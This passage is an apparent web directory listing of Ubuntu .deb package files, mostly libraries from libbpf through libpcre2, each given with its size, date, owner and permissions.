136.775 KB
December 05 2022 5:53:39
root
0644
libbpf1_1%3a1.3.0-2build2_amd64.deb
161.85 KB
March 31 2024 5:07:53
root
0644
libbpfcc_0.29.1+ds-1ubuntu7_amd64.deb
647.836 KB
April 19 2024 12:44:16
root
0644
libbrotli1_1.1.0-2build2_amd64.deb
322.979 KB
April 01 2024 9:55:38
root
0644
libbsd0_0.12.1-1build1.1_amd64.deb
40.271 KB
October 15 2024 6:00:59
root
0644
libbz2-1.0_1.0.8-5.1build0.1_amd64.deb
33.564 KB
August 09 2024 5:37:33
root
0644
libc-bin_2.35-0ubuntu3.10_amd64.deb
689.152 KB
May 28 2025 5:57:39
root
0644
libc-bin_2.35-0ubuntu3.8_amd64.deb
689.311 KB
May 30 2024 12:10:48
root
0644
libc-bin_2.39-0ubuntu8.6_amd64.deb
665.814 KB
September 22 2025 11:03:07
root
0644
libc-client2007e_8%3a2007f~dfsg-7build3_amd64.deb
610.963 KB
April 01 2024 4:03:47
root
0644
libc-dev-bin_2.35-0ubuntu3.10_amd64.deb
19.811 KB
May 28 2025 5:57:39
root
0644
libc-dev-bin_2.39-0ubuntu8.6_amd64.deb
19.939 KB
September 22 2025 11:03:07
root
0644
libc-devtools_2.35-0ubuntu3.10_amd64.deb
28.279 KB
May 28 2025 5:57:38
root
0644
libc-devtools_2.39-0ubuntu8.6_amd64.deb
28.646 KB
September 22 2025 11:03:06
root
0644
libc6-dev_2.35-0ubuntu3.10_amd64.deb
2 MB
May 28 2025 5:57:39
root
0644
libc6-dev_2.39-0ubuntu8.6_amd64.deb
2.03 MB
September 22 2025 11:03:08
root
0644
libc6_2.35-0ubuntu3.10_amd64.deb
3.08 MB
May 28 2025 5:57:40
root
0644
libc6_2.35-0ubuntu3.8_amd64.deb
3.09 MB
May 30 2024 12:10:49
root
0644
libc6_2.39-0ubuntu8.6_amd64.deb
3.11 MB
September 22 2025 11:03:08
root
0644
libcap-ng0_0.8.4-2build2_amd64.deb
14.824 KB
April 01 2024 9:55:31
root
0644
libcap2-bin_1%3a2.44-1ubuntu0.22.04.1_amd64.deb
25.408 KB
June 14 2023 9:58:37
root
0644
libcap2-bin_1%3a2.66-5ubuntu2.2_amd64.deb
33.369 KB
February 24 2025 9:31:39
root
0644
libcap2_1%3a2.44-1ubuntu0.22.04.1_amd64.deb
17.904 KB
June 14 2023 9:58:37
root
0644
libcap2_1%3a2.66-5ubuntu2.2_amd64.deb
29.336 KB
February 24 2025 9:31:39
root
0644
libcbor0.10_0.10.2-1.2ubuntu2_amd64.deb
25.238 KB
March 31 2024 10:28:57
root
0644
libcc1-0_12.3.0-1ubuntu1~22.04.2_amd64.deb
47.15 KB
August 19 2025 9:01:28
root
0644
libcc1-0_14.2.0-4ubuntu2~24.04_amd64.deb
46.875 KB
September 27 2024 6:19:42
root
0644
libcgi-fast-perl_1%3a2.17-1_all.deb
10.059 KB
November 18 2023 7:14:41
root
0644
libcgi-pm-perl_4.63-1_all.deb
180.268 KB
March 20 2024 10:57:52
root
0644
libclang-cpp18_1%3a18.1.3-1ubuntu1_amd64.deb
12.87 MB
June 15 2024 3:04:26
root
0644
libclang1-18_1%3a18.1.3-1ubuntu1_amd64.deb
7.44 MB
June 15 2024 3:04:26
root
0644
libclone-perl_0.46-1build3_amd64.deb
10.477 KB
March 31 2024 5:07:52
root
0644
libcom-err2_1.46.5-2ubuntu1.2_amd64.deb
9.086 KB
July 31 2024 5:14:20
root
0644
libcom-err2_1.47.0-2.4~exp1ubuntu4.1_amd64.deb
22.443 KB
July 31 2024 5:15:46
root
0644
libcrypt-dev_1%3a4.4.36-4build1_amd64.deb
109.16 KB
April 09 2024 1:02:55
root
0644
libcrypt1_1%3a4.4.36-4build1_amd64.deb
80.373 KB
April 09 2024 1:02:55
root
0644
libcryptsetup12_2%3a2.4.3-1ubuntu1.2_amd64.deb
206.443 KB
October 18 2023 5:59:10
root
0644
libcryptsetup12_2%3a2.7.0-1ubuntu4.2_amd64.deb
259.885 KB
February 08 2025 12:29:27
root
0644
libctf-nobfd0_2.42-4ubuntu2.8_amd64.deb
95.564 KB
December 11 2025 12:31:43
root
0644
libctf0_2.42-4ubuntu2.8_amd64.deb
92.262 KB
December 11 2025 12:32:10
root
0644
libcups2_2.4.1op1-1ubuntu4.12_amd64.deb
257.465 KB
September 12 2025 12:43:13
root
0644
libcups2t64_2.4.7-1.2ubuntu7.9_amd64.deb
266.242 KB
December 05 2025 12:58:23
root
0644
libcurl3t64-gnutls_8.5.0-2ubuntu10.6_amd64.deb
325.547 KB
December 16 2024 9:16:48
root
0644
libcurl4_7.81.0-1ubuntu1.17_amd64.deb
283.018 KB
August 05 2024 7:51:38
root
0644
libcurl4t64_8.5.0-2ubuntu10.6_amd64.deb
332.984 KB
December 16 2024 9:16:48
root
0644
libdav1d7_1.4.1-1build1_amd64.deb
589.861 KB
April 01 2024 3:32:58
root
0644
libdb5.3t64_5.3.28+dfsg2-7_amd64.deb
716.895 KB
April 14 2024 2:24:05
root
0644
libdbus-1-3_1.12.20-2ubuntu4.1_amd64.deb
184.143 KB
October 27 2022 9:08:35
root
0644
libdbus-1-3_1.14.10-4ubuntu4.1_amd64.deb
204.818 KB
August 09 2024 5:37:29
root
0644
libde265-0_1.0.15-1build3_amd64.deb
162.316 KB
April 16 2024 2:24:07
root
0644
libdebconfclient0_0.271ubuntu3_amd64.deb
11.131 KB
March 31 2024 5:07:39
root
0644
libdebhelper-perl_13.14.1ubuntu5_all.deb
87.703 KB
March 01 2024 1:58:31
root
0644
libdeflate0_1.19-1build1.1_amd64.deb
42.885 KB
August 09 2024 6:49:32
root
0644
libdevmapper1.02.1_2%3a1.02.185-3ubuntu3.2_amd64.deb
135.932 KB
December 16 2024 11:35:22
root
0644
libdpkg-perl_1.22.6ubuntu6.5_all.deb
262.527 KB
September 24 2025 9:48:55
root
0644
libdrm-common_2.4.113-2~ubuntu0.22.04.1_all.deb
5.322 KB
December 16 2022 5:53:58
root
0644
libdrm-common_2.4.122-1~ubuntu0.24.04.2_all.deb
8.266 KB
November 05 2025 7:50:11
root
0644
libdrm2_2.4.113-2~ubuntu0.22.04.1_amd64.deb
37.213 KB
December 16 2022 5:53:58
root
0644
libdrm2_2.4.122-1~ubuntu0.24.04.2_amd64.deb
39.688 KB
November 05 2025 7:50:10
root
0644
libduktape207_2.7.0+tests-0ubuntu3_amd64.deb
140.037 KB
April 09 2024 1:03:42
root
0644
libdw1t64_0.190-1.1ubuntu0.1_amd64.deb
255.072 KB
March 25 2025 4:51:57
root
0644
libedit2_3.1-20230828-1build1_amd64.deb
95.299 KB
April 09 2024 1:03:15
root
0644
libefiboot1t64_38-3.1build1_amd64.deb
39.619 KB
March 31 2024 5:07:40
root
0644
libefivar1t64_38-3.1build1_amd64.deb
56.43 KB
March 31 2024 5:07:39
root
0644
libelf1t64_0.190-1.1ubuntu0.1_amd64.deb
56.455 KB
March 25 2025 4:51:56
root
0644
libencode-locale-perl_1.05-3_all.deb
11.297 KB
November 06 2022 11:22:06
root
0644
liberror-perl_0.17029-2_all.deb
25.031 KB
November 06 2022 11:22:03
root
0644
libestr0_0.1.11-1build1_amd64.deb
7.619 KB
April 09 2024 1:03:16
root
0644
libevdev2_1.13.1+dfsg-1build1_amd64.deb
36.871 KB
April 09 2024 1:03:15
root
0644
libevent-core-2.1-7t64_2.1.12-stable-9ubuntu2_amd64.deb
89.133 KB
March 31 2024 5:07:42
root
0644
libevent-pthreads-2.1-7t64_2.1.12-stable-9ubuntu2_amd64.deb
7.795 KB
March 31 2024 5:07:42
root
0644
libexpat1_2.4.7-1ubuntu0.3_amd64.deb
88.885 KB
March 14 2024 7:05:11
root
0644
libexpat1_2.6.1-2ubuntu0.3_amd64.deb
85.973 KB
April 08 2025 5:18:17
root
0644
libext2fs2_1.46.5-2ubuntu1.2_amd64.deb
203.535 KB
July 31 2024 5:14:20
root
0644
libext2fs2t64_1.47.0-2.4~exp1ubuntu4.1_amd64.deb
216.531 KB
July 31 2024 5:15:45
root
0644
libfakeroot_1.33-1_amd64.deb
31.615 KB
January 22 2024 7:41:33
root
0644
libfastjson4_1.2304.0-1build1_amd64.deb
22.564 KB
April 09 2024 1:03:15
root
0644
libfcgi-bin_2.4.2-2.1ubuntu0.24.04.1_amd64.deb
10.893 KB
May 06 2025 7:43:46
root
0644
libfcgi-bin_2.4.2-2ubuntu0.1_amd64.deb
10.877 KB
May 06 2025 7:43:43
root
0644
libfcgi-perl_0.82+ds-3build2_amd64.deb
21.176 KB
April 08 2024 11:20:56
root
0644
libfcgi0ldbl_2.4.2-2ubuntu0.1_amd64.deb
27.432 KB
May 06 2025 7:43:43
root
0644
libfcgi0t64_2.4.2-2.1ubuntu0.24.04.1_amd64.deb
26.396 KB
May 06 2025 7:43:46
root
0644
libfdisk1_2.37.2-4ubuntu3.4_amd64.deb
137.137 KB
April 10 2024 8:25:02
root
0644
libfdisk1_2.39.3-9ubuntu6.3_amd64.deb
142.902 KB
June 26 2025 6:40:15
root
0644
libffi8_3.4.6-1build1_amd64.deb
24.139 KB
April 09 2024 1:03:07
root
0644
libfftw3-double3_3.3.10-1ubuntu3_amd64.deb
818.607 KB
March 31 2024 9:32:24
root
0644
libfido2-1_1.14.0-1build3_amd64.deb
81.568 KB
April 15 2024 3:23:47
root
0644
libfile-fcntllock-perl_0.22-4ubuntu5_amd64.deb
29.947 KB
March 31 2024 5:07:44
root
0644
libfile-stripnondeterminism-perl_1.13.1-1_all.deb
17.654 KB
January 16 2023 1:24:17
root
0644
libfontconfig1_2.15.0-1.1ubuntu2_amd64.deb
135.324 KB
March 31 2024 9:32:26
root
0644
libfontenc1_1%3a1.1.8-1build1_amd64.deb
13.668 KB
March 31 2024 5:07:44
root
0644
libfreetype6_2.11.1+dfsg-1ubuntu0.2_amd64.deb
379.713 KB
May 09 2023 7:58:43
root
0644
libfreetype6_2.13.2+dfsg-1build3_amd64.deb
392.955 KB
April 01 2024 2:38:11
root
0644
libfribidi0_1.0.13-3build1_amd64.deb
25.537 KB
April 09 2024 1:03:38
root
0644
libfribidi0_1.0.8-2ubuntu3.1_amd64.deb
25.484 KB
April 27 2022 11:13:34
root
0644
libfuse2t64_2.9.9-8.1build1_amd64.deb
87.762 KB
April 01 2024 2:37:11
root
0644
libfuse3-3_3.14.0-5build1_amd64.deb
81.176 KB
April 09 2024 1:03:38
root
0644
libgav1-1_0.18.0-1build3_amd64.deb
348.777 KB
April 01 2024 1:46:25
root
0644
libgcc-11-dev_11.4.0-1ubuntu1~22.04.2_amd64.deb
2.4 MB
August 19 2025 9:00:56
root
0644
libgcc-11-dev_11.5.0-1ubuntu1~24.04_amd64.deb
2.37 MB
October 10 2024 12:53:11
root
0644
libgcc-13-dev_13.3.0-6ubuntu2~24.04_amd64.deb
2.56 MB
September 28 2024 12:38:04
root
0644
libgcc-s1_12.3.0-1ubuntu1~22.04.2_amd64.deb
52.627 KB
August 19 2025 9:01:27
root
0644
libgcc-s1_12.3.0-1ubuntu1~22.04_amd64.deb
52.625 KB
June 29 2023 10:09:14
root
0644
libgcc-s1_14.2.0-4ubuntu2~24.04_amd64.deb
76.711 KB
September 27 2024 6:19:40
root
0644
libgcrypt20_1.10.3-2build1_amd64.deb
519.707 KB
April 09 2024 1:03:03
root
0644
libgd3_2.3.3-13+ubuntu24.04.1+deb.sury.org+1_amd64.deb
126.871 KB
April 27 2025 9:54:58
root
0644
libgdbm-compat4t64_1.23-5.1build1_amd64.deb
6.553 KB
April 01 2024 2:38:13
root
0644
libgdbm6t64_1.23-5.1build1_amd64.deb
33.633 KB
April 01 2024 2:38:13
root
0644
libgirepository-1.0-1_1.80.1-1_amd64.deb
80 KB
April 02 2024 7:02:30
root
0644
libglib2.0-0_2.72.4-0ubuntu2.3_amd64.deb
1.4 MB
May 09 2024 9:06:03
root
0644
libglib2.0-0_2.72.4-0ubuntu2.6_amd64.deb
1.4 MB
July 02 2025 7:41:06
root
0644
libglib2.0-0t64_2.80.0-6ubuntu3.4_amd64.deb
1.47 MB
May 26 2025 4:51:10
root
0644
libglib2.0-bin_2.72.4-0ubuntu2.6_amd64.deb
78.967 KB
July 02 2025 7:41:06
root
0644
libglib2.0-bin_2.80.0-6ubuntu3.4_amd64.deb
95.631 KB
May 26 2025 4:51:12
root
0644
libglib2.0-data_2.72.4-0ubuntu2.3_all.deb
4.557 KB
May 09 2024 9:06:03
root
0644
libglib2.0-data_2.72.4-0ubuntu2.6_all.deb
4.588 KB
July 02 2025 7:41:06
root
0644
libglib2.0-data_2.80.0-6ubuntu3.4_all.deb
47.527 KB
May 26 2025 4:51:09
root
0644
libgmp10_2%3a6.3.0+dfsg-2ubuntu6.1_amd64.deb
247.52 KB
October 15 2024 6:01:00
root
0644
libgnutls30_3.7.3-4ubuntu1.5_amd64.deb
943.811 KB
April 16 2024 1:05:23
root
0644
libgnutls30_3.7.3-4ubuntu1.7_amd64.deb
944.686 KB
July 14 2025 8:48:56
root
0644
libgnutls30t64_3.8.3-1.1ubuntu3.4_amd64.deb
974.611 KB
July 14 2025 8:49:08
root
0644
libgomp1_12.3.0-1ubuntu1~22.04.2_amd64.deb
123.596 KB
August 19 2025 9:01:31
root
0644
libgomp1_14.2.0-4ubuntu2~24.04_amd64.deb
144.473 KB
September 27 2024 6:19:46
root
0644
libgpg-error0_1.47-3build2.1_amd64.deb
68.449 KB
October 15 2024 6:47:26
root
0644
libgpm2_1.20.7-11_amd64.deb
13.773 KB
March 31 2024 8:36:48
root
0644
libgprofng0_2.42-4ubuntu2.8_amd64.deb
829.223 KB
December 11 2025 12:31:42
root
0644
libgs-common_10.02.1~dfsg1-0ubuntu7.8_all.deb
171.906 KB
September 29 2025 8:37:07
root
0644
libgs10-common_10.02.1~dfsg1-0ubuntu7.8_all.deb
476.557 KB
September 29 2025 8:37:07
root
0644
libgs10_10.02.1~dfsg1-0ubuntu7.8_amd64.deb
3.72 MB
September 29 2025 8:37:08
root
0644
libgs9-common_9.55.0~dfsg1-0ubuntu5.12_all.deb
735.027 KB
July 08 2025 10:38:09
root
0644
libgs9_9.55.0~dfsg1-0ubuntu5.12_amd64.deb
4.8 MB
July 08 2025 10:38:09
root
0644
libgssapi-krb5-2_1.19.2-2ubuntu0.4_amd64.deb
140.551 KB
August 08 2024 12:05:47
root
0644
libgssapi-krb5-2_1.19.2-2ubuntu0.7_amd64.deb
140.537 KB
May 28 2025 10:21:18
root
0644
libgssapi-krb5-2_1.20.1-6ubuntu2.6_amd64.deb
139.645 KB
May 28 2025 10:21:44
root
0644
libgstreamer1.0-0_1.24.2-1ubuntu0.1_amd64.deb
1.11 MB
December 18 2024 9:15:38
root
0644
libheif-plugin-aomdec_1.17.6-1ubuntu4.1_amd64.deb
10.168 KB
October 23 2024 1:59:53
root
0644
libheif-plugin-aomenc_1.17.6-1ubuntu4.1_amd64.deb
14.318 KB
October 23 2024 1:59:53
root
0644
libheif-plugin-libde265_1.17.6-1ubuntu4.1_amd64.deb
7.984 KB
October 23 2024 1:59:53
root
0644
libheif1_1.17.6-1ubuntu4.1_amd64.deb
268.947 KB
October 23 2024 1:59:53
root
0644
libhogweed6t64_3.9.1-2.2build1.1_amd64.deb
193.895 KB
August 09 2024 6:49:16
root
0644
libhtml-parser-perl_3.81-1build3_amd64.deb
83.785 KB
March 31 2024 5:07:45
root
0644
libhtml-tagset-perl_3.20-6_all.deb
11.01 KB
November 06 2022 11:22:04
root
0644
libhtml-template-perl_2.97-2_all.deb
58.742 KB
June 15 2022 1:42:32
root
0644
libhttp-date-perl_6.06-1_all.deb
9.949 KB
November 02 2023 1:25:50
root
0644
libhttp-message-perl_6.45-1ubuntu1_all.deb
76.406 KB
December 05 2023 6:52:09
root
0644
libhwasan0_14.2.0-4ubuntu2~24.04_amd64.deb
1.56 MB
September 27 2024 6:19:40
root
0644
libice6_2%3a1.0.10-1build3_amd64.deb
40.428 KB
April 09 2024 1:03:14
root
0644
libicu74_74.2-1ubuntu3.1_amd64.deb
10.36 MB
August 09 2024 5:37:26
root
0644
libidn12_1.42-1build1_amd64.deb
54.582 KB
April 09 2024 1:03:10
root
0644
libidn2-0_2.3.7-2build1.1_amd64.deb
64.689 KB
October 15 2024 6:47:26
root
0644
libijs-0.35_0.35-15.1build1_amd64.deb
14.959 KB
April 09 2024 1:03:23
root
0644
libimagequant0_2.18.0-1build1_amd64.deb
35.439 KB
April 09 2024 1:03:11
root
0644
libio-html-perl_1.004-3_all.deb
15.498 KB
April 30 2022 9:38:03
root
0644
libip4tc2_1.8.10-3ubuntu2_amd64.deb
22.795 KB
April 09 2024 1:03:21
root
0644
libip4tc2_1.8.7-1ubuntu5.2_amd64.deb
19.406 KB
January 20 2024 10:05:03
root
0644
libip6tc2_1.8.10-3ubuntu2_amd64.deb
23.176 KB
April 09 2024 1:03:21
root
0644
libip6tc2_1.8.7-1ubuntu5.2_amd64.deb
19.85 KB
January 20 2024 10:05:02
root
0644
libisl23_0.26-3build1.1_amd64.deb
663.879 KB
October 15 2024 6:01:00
root
0644
libitm1_12.3.0-1ubuntu1~22.04.2_amd64.deb
29.445 KB
August 19 2025 9:01:30
root
0644
libitm1_14.2.0-4ubuntu2~24.04_amd64.deb
29.018 KB
September 27 2024 6:19:46
root
0644
libjansson4_2.14-2build2_amd64.deb
32.061 KB
March 31 2024 10:29:25
root
0644
libjbig0_2.1-6.1ubuntu2_amd64.deb
28.973 KB
April 09 2024 1:03:31
root
0644
libjbig2dec0_0.20-1build3_amd64.deb
63.52 KB
March 31 2024 5:07:44
root
0644
libjemalloc2_5.3.0-2build1_amd64.deb
250.145 KB
April 19 2024 4:58:04
root
0644
libjpeg-turbo8_2.1.5-2ubuntu2_amd64.deb
146.467 KB
April 09 2024 1:03:06
root
0644
libjpeg8_8c-2ubuntu11_amd64.deb
2.098 KB
February 10 2023 5:38:44
root
0644
libjson-c5_0.15-3~ubuntu1.22.04.2_amd64.deb
32.67 KB
August 29 2023 4:23:30
root
0644
libjson-c5_0.17-1build1_amd64.deb
34.512 KB
April 09 2024 1:03:20
root
0644
libk5crypto3_1.19.2-2ubuntu0.4_amd64.deb
84.309 KB
August 08 2024 12:05:47
root
0644
libk5crypto3_1.19.2-2ubuntu0.7_amd64.deb
84.473 KB
May 28 2025 10:21:18
root
0644
libk5crypto3_1.20.1-6ubuntu2.6_amd64.deb
80.049 KB
May 28 2025 10:21:44
root
0644
libkeyutils1_1.6.3-3build1_amd64.deb
9.268 KB
April 09 2024 1:03:19
root
0644
libklibc_2.0.10-4ubuntu0.1_amd64.deb
44.955 KB
April 16 2024 7:50:17
root
0644
libklibc_2.0.13-4ubuntu0.1_amd64.deb
46.094 KB
May 23 2024 5:05:04
root
0644
libkmod2_31+20240202-2ubuntu7.1_amd64.deb
50.51 KB
October 15 2024 6:00:59
root
0644
libkrb5-3_1.19.2-2ubuntu0.4_amd64.deb
347.699 KB
August 08 2024 12:05:48
root
0644
libkrb5-3_1.19.2-2ubuntu0.7_amd64.deb
347.348 KB
May 28 2025 10:21:18
root
0644
libkrb5-3_1.20.1-6ubuntu2.6_amd64.deb
339.416 KB
May 28 2025 10:21:44
root
0644
libkrb5support0_1.19.2-2ubuntu0.4_amd64.deb
31.525 KB
August 08 2024 12:05:47
root
0644
libkrb5support0_1.19.2-2ubuntu0.7_amd64.deb
31.941 KB
May 28 2025 10:21:18
root
0644
libkrb5support0_1.20.1-6ubuntu2.6_amd64.deb
33.588 KB
May 28 2025 10:21:44
root
0644
libksba8_1.6.0-2ubuntu0.2_amd64.deb
116.102 KB
January 05 2023 8:48:26
root
0644
libksba8_1.6.6-1build1_amd64.deb
119.1 KB
March 31 2024 10:28:25
root
0644
liblcms2-2_2.14-2build1_amd64.deb
156.879 KB
April 09 2024 1:03:19
root
0644
libldap-2.5-0_2.5.18+dfsg-0ubuntu0.22.04.2_amd64.deb
178.902 KB
July 16 2024 3:13:37
root
0644
libldap-2.5-0_2.5.19+dfsg-0ubuntu0.22.04.1_amd64.deb
179.264 KB
May 01 2025 6:20:23
root
0644
libldap-common_2.5.18+dfsg-0ubuntu0.22.04.2_all.deb
15.482 KB
July 16 2024 3:13:37
root
0644
libldap-common_2.5.19+dfsg-0ubuntu0.22.04.1_all.deb
15.705 KB
May 01 2025 6:20:23
root
0644
libldap-common_2.6.7+dfsg-1~exp1ubuntu8.2_all.deb
30.932 KB
January 25 2025 4:19:06
root
0644
libldap2_2.6.7+dfsg-1~exp1ubuntu8.2_amd64.deb
191.244 KB
January 25 2025 4:19:06
root
0644
liblerc4_4.0.0+ds-4ubuntu2_amd64.deb
175.174 KB
April 09 2024 1:03:19
root
0644
libllvm18_1%3a18.1.3-1ubuntu1_amd64.deb
26.24 MB
June 15 2024 3:04:25
root
0644
liblmdb0_0.9.31-1build1_amd64.deb
46.939 KB
April 09 2024 1:02:50
root
0644
liblocale-gettext-perl_1.07-6ubuntu5_amd64.deb
15.441 KB
March 31 2024 5:07:55
root
0644
liblqr-1-0_0.4.2-2.1build2_amd64.deb
27.842 KB
April 01 2024 3:32:42
root
0644
liblsan0_12.3.0-1ubuntu1~22.04.2_amd64.deb
1.02 MB
August 19 2025 9:01:29
root
0644
liblsan0_14.2.0-4ubuntu2~24.04_amd64.deb
1.26 MB
September 27 2024 6:19:43
root
0644
libltdl-dev_2.4.7-7build1_amd64.deb
164.52 KB
April 09 2024 1:02:42
root
0644
libltdl7_2.4.7-7build1_amd64.deb
39.314 KB
April 09 2024 1:02:42
root
0644
liblua5.1-0_5.1.5-9build2_amd64.deb
116.992 KB
April 01 2024 4:35:15
root
0644
liblua5.3-0_5.3.6-2build2_amd64.deb
139.586 KB
March 31 2024 5:08:45
root
0644
liblua5.4-0_5.4.6-3build2_amd64.deb
162.33 KB
March 31 2024 5:08:45
root
0644
liblwp-mediatypes-perl_6.04-2_all.deb
19.631 KB
December 07 2022 8:03:28
root
0644
liblz4-1_1.9.4-1build1.1_amd64.deb
61.584 KB
August 09 2024 6:49:15
root
0644
liblzf1_3.6-4_amd64.deb
7.445 KB
June 28 2023 1:34:16
root
0644
liblzma5_5.6.1+really5.4.5-1ubuntu0.2_amd64.deb
124.18 KB
April 04 2025 1:31:04
root
0644
libmagic-mgc_1%3a5.41-3ubuntu0.1_amd64.deb
251.279 KB
September 13 2023 12:23:29
root
0644
libmagic-mgc_1%3a5.45-3build1_amd64.deb
300.162 KB
March 31 2024 5:07:42
root
0644
libmagic1_1%3a5.41-3ubuntu0.1_amd64.deb
85.197 KB
September 13 2023 12:23:29
root
0644
libmagic1t64_1%3a5.45-3build1_amd64.deb
85.195 KB
March 31 2024 5:07:42
root
0644
libmagickcore-6.q16-7t64_8%3a6.9.12.98+dfsg1-5.2build2_amd64.deb
1.73 MB
April 01 2024 5:14:09
root
0644
libmagickwand-6.q16-7t64_8%3a6.9.12.98+dfsg1-5.2build2_amd64.deb
310.738 KB
April 01 2024 5:14:08
root
0644
libmail-sendmail-perl_0.80-3_all.deb
21.236 KB
December 08 2022 7:30:24
root
0644
libmaxminddb0_1.9.1-1build1_amd64.deb
23.811 KB
April 09 2024 1:03:09
root
0644
libmd0_1.1.0-2build1.1_amd64.deb
26.344 KB
October 15 2024 6:47:26
root
0644
libmecab2_0.996-14ubuntu4_amd64.deb
196.193 KB
April 01 2024 10:51:49
root
0644
libmnl0_1.0.5-2build1_amd64.deb
11.984 KB
April 09 2024 1:03:07
root
0644
libmount1_2.37.2-4ubuntu3.4_amd64.deb
119.139 KB
April 10 2024 8:25:02
root
0644
libmount1_2.39.3-9ubuntu6.3_amd64.deb
130.43 KB
June 26 2025 6:40:15
root
0644
libmpc3_1.3.1-1build1.1_amd64.deb
53.355 KB
October 15 2024 6:47:23
root
0644
libmpfr6_4.2.1-1build1.1_amd64.deb
344.746 KB
October 15 2024 6:47:23
root
0644
libncurses6_6.3-2ubuntu0.1_amd64.deb
108.666 KB
May 23 2023 6:43:55
root
0644
libncurses6_6.4+20240113-1ubuntu2_amd64.deb
109.279 KB
April 09 2024 1:02:44
root
0644
libncursesw6_6.3-2ubuntu0.1_amd64.deb
144.037 KB
May 23 2023 6:43:56
root
0644
libncursesw6_6.4+20240113-1ubuntu2_amd64.deb
144.377 KB
April 09 2024 1:02:44
root
0644
libnetfilter-conntrack3_1.0.9-6build1_amd64.deb
44.158 KB
April 09 2024 1:03:06
root
0644
libnetplan0_0.106.1-7ubuntu0.22.04.4_amd64.deb
108.16 KB
June 29 2024 3:55:23
root
0644
libnetplan1_1.1.2-2~ubuntu24.04.2_amd64.deb
129.084 KB
July 02 2025 7:42:04
root
0644
libnettle8t64_3.9.1-2.2build1.1_amd64.deb
177.379 KB
August 09 2024 6:49:16
root
0644
libnewt0.52_0.52.24-2ubuntu2_amd64.deb
45.678 KB
April 01 2024 10:51:47
root
0644
libnfnetlink0_1.0.2-2build1_amd64.deb
14.463 KB
April 09 2024 1:03:06
root
0644
libnftables1_1.0.2-1ubuntu3_amd64.deb
324.307 KB
August 17 2022 10:54:09
root
0644
libnftables1_1.0.9-1build1_amd64.deb
350.035 KB
April 09 2024 1:02:45
root
0644
libnftnl11_1.2.6-2build1_amd64.deb
64.439 KB
April 09 2024 1:03:05
root
0644
libnghttp2-14_1.43.0-1ubuntu0.2_amd64.deb
75.057 KB
April 26 2024 6:04:32
root
0644
libnghttp2-14_1.59.0-1ubuntu0.2_amd64.deb
72.6 KB
October 15 2024 8:02:26
root
0644
libnl-3-200_3.7.0-0.3build1.1_amd64.deb
54.4 KB
October 15 2024 6:47:26
root
0644
libnl-genl-3-200_3.7.0-0.3build1.1_amd64.deb
11.945 KB
October 15 2024 6:47:25
root
0644
libnpth0t64_1.6-3.1build1_amd64.deb
8.182 KB
March 31 2024 11:26:28
root
0644
libnsl-dev_1.3.0-3build3_amd64.deb
68.873 KB
March 31 2024 5:07:53
root
0644
libnsl2_1.3.0-3build3_amd64.deb
40.395 KB
March 31 2024 5:07:53
root
0644
libnss-nis_3.1-0ubuntu7_amd64.deb
25.896 KB
April 22 2024 7:48:00
root
0644
libnss-nisplus_1.3-5build1_amd64.deb
21.854 KB
April 01 2024 4:35:47
root
0644
libnss-systemd_249.11-0ubuntu3.12_amd64.deb
130.018 KB
January 06 2024 4:05:33
root
0644
libnss-systemd_249.11-0ubuntu3.16_amd64.deb
130.041 KB
June 09 2025 10:50:59
root
0644
libnss-systemd_255.4-1ubuntu8.11_amd64.deb
155.604 KB
September 02 2025 6:56:27
root
0644
libntfs-3g89_1%3a2021.8.22-3ubuntu1.2_amd64.deb
157.633 KB
November 02 2022 8:04:24
root
0644
libntfs-3g89t64_1%3a2022.10.3-1.2ubuntu3_amd64.deb
155.225 KB
April 08 2024 11:20:50
root
0644
libnuma1_2.0.18-1build1_amd64.deb
22.723 KB
April 09 2024 1:02:45
root
0644
libonig5_6.9.9-1build1_amd64.deb
168.297 KB
April 09 2024 1:03:05
root
0644
libopenjp2-7_2.5.0-2ubuntu0.4_amd64.deb
169.359 KB
September 19 2025 3:06:01
root
0644
libp11-kit0_0.25.3-4ubuntu2.1_amd64.deb
292.514 KB
August 09 2024 6:49:16
root
0644
libpackagekit-glib2-18_1.2.8-2ubuntu1.4_amd64.deb
117.432 KB
October 17 2025 11:23:47
root
0644
libpam-cap_1%3a2.44-1ubuntu0.22.04.1_amd64.deb
7.742 KB
June 14 2023 9:58:37
root
0644
libpam-cap_1%3a2.66-5ubuntu2.2_amd64.deb
12.17 KB
February 24 2025 9:31:39
root
0644
libpam-modules-bin_1.4.0-11ubuntu2.4_amd64.deb
36.705 KB
January 18 2024 2:10:42
root
0644
libpam-modules-bin_1.4.0-11ubuntu2.6_amd64.deb
36.539 KB
June 19 2025 12:28:43
root
0644
libpam-modules-bin_1.5.3-5ubuntu5.5_amd64.deb
50.635 KB
September 22 2025 11:03:05
root
0644
libpam-modules_1.4.0-11ubuntu2.4_amd64.deb
273.383 KB
January 18 2024 2:10:43
root
0644
libpam-modules_1.4.0-11ubuntu2.6_amd64.deb
275.506 KB
June 19 2025 12:28:44
root
0644
libpam-modules_1.5.3-5ubuntu5.5_amd64.deb
279.17 KB
September 22 2025 11:03:05
root
0644
libpam-runtime_1.4.0-11ubuntu2.4_all.deb
39.314 KB
January 18 2024 2:10:42
root
0644
libpam-runtime_1.4.0-11ubuntu2.6_all.deb
39.279 KB
June 19 2025 12:28:42
root
0644
libpam-runtime_1.5.3-5ubuntu5.5_all.deb
39.799 KB
September 22 2025 11:03:04
root
0644
libpam-systemd_249.11-0ubuntu3.12_amd64.deb
197.93 KB
January 06 2024 4:05:33
root
0644
libpam-systemd_249.11-0ubuntu3.16_amd64.deb
198.512 KB
June 09 2025 10:51:01
root
0644
libpam-systemd_255.4-1ubuntu8.11_amd64.deb
229.703 KB
September 02 2025 6:56:27
root
0644
libpam0g_1.4.0-11ubuntu2.4_amd64.deb
58.75 KB
January 18 2024 2:10:43
root
0644
libpam0g_1.4.0-11ubuntu2.6_amd64.deb
58.479 KB
June 19 2025 12:28:43
root
0644
libpam0g_1.5.3-5ubuntu5.5_amd64.deb
66.229 KB
September 22 2025 11:03:05
root
0644
libpaper-utils_1.1.29build1_amd64.deb
8.447 KB
April 09 2024 1:03:04
root
0644
libpaper1_1.1.29build1_amd64.deb
13.1 KB
April 09 2024 1:03:04
root
0644
libparted2t64_3.6-4build1_amd64.deb
148.08 KB
April 01 2024 2:38:00
root
0644
libpci3_1%3a3.10.0-2build1_amd64.deb
35.604 KB
April 09 2024 1:02:42
root
0644
libpcre2-16-0_10.42-4ubuntu2.1_amd64.deb
205.168 KB
October 15 2024 8:02:25
root
0644
libpcre2-32-0_10.42-4ubuntu2.1_amd64.deb
192.473 KB
October 15 2024 8:02:25
root
0644
